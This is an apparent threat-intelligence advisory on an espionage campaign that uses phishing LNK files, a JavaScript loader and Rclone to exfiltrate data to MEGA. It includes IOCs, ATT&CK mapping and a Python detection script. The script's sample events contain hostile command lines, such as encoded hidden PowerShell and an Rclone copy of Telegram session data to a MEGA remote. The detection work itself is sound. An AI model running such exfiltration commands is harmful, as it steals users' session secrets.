A stealthy campaign abusing legitimate tools and cloud services highlights the evolution of modern intelligence-driven cyber operations
CyberShelter Threat Intelligence Team has identified an ongoing advanced cyber espionage campaign, tracked as Operation CamelClone, targeting high-value sectors including government, defense, diplomacy, and energy across multiple countries.
The campaign leverages spear-phishing, malicious shortcut files, and a custom JavaScript loader to deploy legitimate tools like Rclone for covert data exfiltration.
Unlike financially motivated attacks, this operation demonstrates clear indicators of state-aligned intelligence gathering, focusing on long-term access and sensitive data collection.
Targeted Sectors and Geography
Primary Targets
- Government agencies
- Defense and military organizations
- Diplomatic and foreign affairs entities
- Energy and strategic resource sectors
Countries Observed
- Algeria
- Mongolia
- Ukraine
- Kuwait
The targeting pattern strongly suggests geopolitical intelligence objectives rather than opportunistic cybercrime.
Attack Chain Breakdown
Stage 1: Spear-Phishing Delivery
Attackers initiate the campaign using phishing emails containing ZIP archives disguised as official or diplomatic documents.
Common lures include:
- Cooperation proposals
- Defense-related documents
- Government communications
Each archive contains:
- A malicious LNK (shortcut file)
- A decoy image or document
Stage 2: LNK Execution and Initial Payload
When the LNK file is executed:
- PowerShell commands are triggered
- The payload is downloaded from attacker-controlled infrastructure
- Execution occurs in temporary directories
This stage uses obfuscation and encoded commands to evade detection.
Stage 3: HOPPINGANT Loader Deployment
The downloaded JavaScript loader (HOPPINGANT):
- Executes encoded PowerShell payloads
- Drops decoy documents to avoid suspicion
- Extracts and deploys Rclone for exfiltration
The loader uses XOR encoding and Windows Script Host to remain stealthy.
Data Exfiltration Strategy
Attackers use Rclone (v1.70.3), a legitimate cloud synchronization tool, to exfiltrate sensitive data.
Targeted Data
- Documents (DOC, PDF, TXT)
- Desktop files
- Communication data
- Telegram Desktop session data (tdata)
Exfiltration Method
- Upload to MEGA cloud storage
- Use of anonymous email services for account creation
This approach allows attackers to blend malicious activity with legitimate traffic.
Infrastructure and Evasion Techniques
Operation CamelClone stands out for its use of legitimate services:
- Payload hosting via public domains
- Cloud storage (MEGA) for data exfiltration
- Anonymous email providers (onionmail)
- Consistent tooling and configuration across campaigns
This reduces detection probability and complicates attribution.
MITRE ATT&CK Mapping
Key techniques observed include:
- Spearphishing Attachment (T1566.001)
- PowerShell Execution (T1059.001)
- JavaScript Execution (T1059.007)
- Obfuscated Files (T1027)
- Web-Based C2 Communication (T1071.001)
- Cloud Exfiltration (T1567.002)
Indicators of Compromise (Highlights)
Malicious Domain
- filebulldogs[.]com
Email Infrastructure
- Multiple onionmail-based accounts
Artifacts
- Malicious LNK loaders
- JavaScript payloads
- Rclone executables
- Obfuscated scripts
CyberShelter Recommendations
Immediate Actions
- Block known malicious domains and monitor outbound cloud traffic
- Restrict execution of PowerShell and suspicious scripts
- Detect unauthorized use of Rclone within endpoints
- Monitor access to Telegram desktop data directories
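The detection items above, as an added example that is not part of the CyberShelter report: a small Python triage routine over constructed Sysmon-style process-creation events that flags encoded PowerShell, a Windows Script Host script run from a temp directory, Rclone execution with a MEGA remote, and access to the Telegram tdata directory. The event field names, paths and command lines are assumptions built for the example.

```python
import re

# Heuristics constructed from the behaviours the advisory describes; they are
# illustrative, not signatures taken from the report.
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)(\s|$)", re.I)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.I)
RCLONE = re.compile(r"rclone", re.I)
MEGA = re.compile(r"\bmega\b", re.I)   # remote type or remote name; heuristic
TDATA = re.compile(r"telegram desktop\\tdata", re.I)

def classify_event(ev):
    """Labels for one process-creation event (Sysmon-like keys, assumed)."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    if image.endswith("powershell.exe") and ENCODED_PS.search(cmd):
        hits.append("encoded_powershell")          # stage 2: encoded commands
    if image.endswith(("wscript.exe", "cscript.exe")) and TEMP_DIR.search(cmd):
        hits.append("wsh_script_from_temp")        # stage 3: loader via WSH
    # Check image and command line so a copy dropped under a temp path fires;
    # a renamed binary would additionally need hash or PE-metadata checks.
    if RCLONE.search(image) or RCLONE.search(cmd):
        hits.append("rclone_execution")
        if MEGA.search(cmd):
            hits.append("rclone_to_mega")          # exfiltration to MEGA
    if TDATA.search(cmd):
        hits.append("telegram_tdata_access")       # Telegram session data
    return hits

def scan(events):
    """Return {index: labels} for each event that triggers at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify_event(ev))}

# Constructed sample events modelling the chain; paths, user name and the
# encoded blob are placeholders, not real indicators.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"Image": PS, "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": f'wscript.exe "{TMP}\\loader.js"'},
    {"Image": TMP + r"\rclone.exe",
     "CommandLine": 'rclone.exe copy "C:\\Users\\u\\AppData\\Roaming\\Telegram '
                    'Desktop\\tdata" mega:backup'},
    {"Image": PS, "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
]
```

Run `scan(SAMPLE_EVENTS)` to see which of the four events fire; the last one, a script-file invocation from a service, is the benign control and produces no label.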
Security Enhancements
- Strengthen phishing awareness programs
- Block or sandbox unknown ZIP attachments
- Implement endpoint detection for script-based execution
- Enhance visibility into cloud storage usage
Strategic Insight
Operation CamelClone highlights a critical shift in cyber threats:
Attackers are no longer relying on malware alone—they are weaponizing legitimate tools and trusted platforms.
This approach enables:
- Stealthy long-term persistence
- Evasion of traditional security controls
- Blending into normal enterprise activity
For organizations, this means detection must evolve from signature-based methods to behavioral and contextual analysis.